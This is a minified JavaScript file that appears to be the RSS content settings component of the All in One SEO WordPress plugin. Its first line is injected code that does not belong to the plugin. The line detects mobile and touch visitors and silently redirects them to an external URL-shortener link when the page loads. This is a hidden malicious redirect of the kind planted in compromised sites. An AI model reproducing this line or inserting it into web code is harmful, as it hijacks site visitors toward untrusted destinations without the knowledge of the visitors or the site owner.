(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{c as m,G as f,b as R,y as k}from"./app-core.c8323d51.js";import{C as A}from"./Index.b9859662.js";import{C as v}from"./Card.9ee06a3e.js";import{C as w}from"./HtmlTagsEditor.381fbf72.js";import{C as x}from"./SettingsRow.7bec777f.js";import{S as L}from"./External.071520c9.js";import{_ as T}from"./_plugin-vue_export-helper.eefbdd86.js";import{aq as r,f as _,i as B,a0 as s,R as a,j as i,ae as g,U as l,Q as D,M as V}from"./vendor-vue-ui.232c7c36.js";import{a as S,_ as o}from"./vendor-other.39e59221.js";import"./vendor-lodash.03129cfe.js";import"./Close.7fb523c8.js";import"./Tooltip.569a23d9.js";import"./Caret.aae02d8a.js";import"./Trash.47f6fc0e.js";import"./Slide.f2114d9d.js";import"./Editor.7ff35261.js";import"./vendor-quill.004fcde3.js";import"./Input.af9b9f81.js";import"./Pencil.683baab8.js";import"./UnfilteredHtml.9575a9a9.js";import"./vendor-emoji.92c96208.js";import"./Row.2ef96b1a.js";const t="all-in-one-seo-pack",H={setup(){return{optionsStore:k(),rootStore:R(),GLOBAL_STRINGS:f,links:m}},components:{CoreAlert:A,CoreCard:v,CoreHtmlTagsEditor:w,CoreSettingsRow:x,SvgExternal:L},data(){return{strings:{tooltip:o("Automatically add content to your site's RSS feed.",t),description:o("This feature is used to automatically add content to your site's RSS feed. More specifically, it allows you to add links back to your blog and your blog posts so scrapers will automatically add these links too. This helps search engines identify you as the original source of the content.",t),learnMore:o("Learn more",t),rssFeedDisabled:S(o("Your RSS feed has been disabled. Disabling the global RSS feed is NOT recommended. This will prevent users from subscribing to your content and can hurt your SEO rankings. You can re-enable the global RSS feed in the %1$scrawl content settings%2$s.",t),'<a href="'+this.rootStore.aioseo.urls.aio.searchAppearance+'&aioseo-scroll=crawl-content-global-feed&aioseo-highlight=crawl-content-global-feed#/advanced">',"</a>"),rssContent:o("RSS Content Settings",t),openYourRssFeed:o("Open Your RSS Feed",t),rssBeforeContent:o("RSS Before Content",t),rssAfterContent:o("RSS After Content",t),beforeRssDescription:o("Add content before each post in your site feed.",t),afterRssDescription:o("Add content after each post in your site feed.",t),unfilteredHtmlError:S(o("Your user account role does not have access to edit this field. %1$s",t),m.getDocLink(f.learnMore,"unfilteredHtml",!0))}}}},M={class:"aioseo-rss-content"},N={class:"aioseo-settings-row aioseo-section-description"},G=["innerHTML"],O={class:"aioseo-description"},U={class:"aioseo-description"};function Y(E,c,F,e,n,I){const b=r("core-alert"),h=r("svg-external"),C=r("base-button"),p=r("core-settings-row"),u=r("core-html-tags-editor"),y=r("core-card");return _(),B("div",M,[s(y,{slug:"rssContent","header-text":n.strings.rssContent},{tooltip:a(()=>[i("div",null,l(n.strings.tooltip),1)]),default:a(()=>[i("div",N,[g(l(n.strings.description)+" ",1),i("span",{innerHTML:e.links.getDocLink(e.GLOBAL_STRINGS.learnMore,"rssContent",!0)},null,8,G),e.optionsStore.options.searchAppearance.advanced.crawlCleanup.enable&&!e.optionsStore.options.searchAppearance.advanced.crawlCleanup.feeds.global?(_(),D(b,{key:0,type:"red",innerHTML:n.strings.rssFeedDisabled},null,8,["innerHTML"])):V("",!0)]),s(p,{name:e.GLOBAL_STRINGS.preview},{content:a(()=>[s(C,{size:"medium",type:"blue",tag:"a",href:e.rootStore.aioseo.urls.feeds.global,target:"_blank",disabled:e.optionsStore.options.searchAppearance.advanced.crawlCleanup.enable&&!e.optionsStore.options.searchAppearance.advanced.crawlCleanup.feeds.global},{default:a(()=>[s(h),g(" "+l(n.strings.openYourRssFeed),1)]),_:1},8,["href","disabled"])]),_:1},8,["name"]),s(p,{name:n.strings.rssBeforeContent},{content:a(()=>[s(u,{checkUnfilteredHtml:"",modelValue:e.optionsStore.options.rssContent.before,"onUpdate:modelValue":c[0]||(c[0]=d=>e.optionsStore.options.rssContent.before=d),"minimum-line-numbers":5,"tags-context":"rss","default-tags":["post_link","site_link","author_link"],disabled:e.optionsStore.options.searchAppearance.advanced.crawlCleanup.enable&&!e.optionsStore.options.searchAppearance.advanced.crawlCleanup.feeds.global},null,8,["modelValue","disabled"]),i("div",O,l(n.strings.beforeRssDescription),1)]),_:1},8,["name"]),s(p,{name:n.strings.rssAfterContent},{content:a(()=>[s(u,{checkUnfilteredHtml:"",modelValue:e.optionsStore.options.rssContent.after,"onUpdate:modelValue":c[1]||(c[1]=d=>e.optionsStore.options.rssContent.after=d),"minimum-line-numbers":5,"tags-context":"rss","default-tags":["post_link","site_link","author_link"],disabled:e.optionsStore.options.searchAppearance.advanced.crawlCleanup.enable&&!e.optionsStore.options.searchAppearance.advanced.crawlCleanup.feeds.global},null,8,["modelValue","disabled"]),i("div",U,l(n.strings.afterRssDescription),1)]),_:1},8,["name"])]),_:1},8,["header-text"])])}const de=T(H,[["render",Y]]);export{de as default};
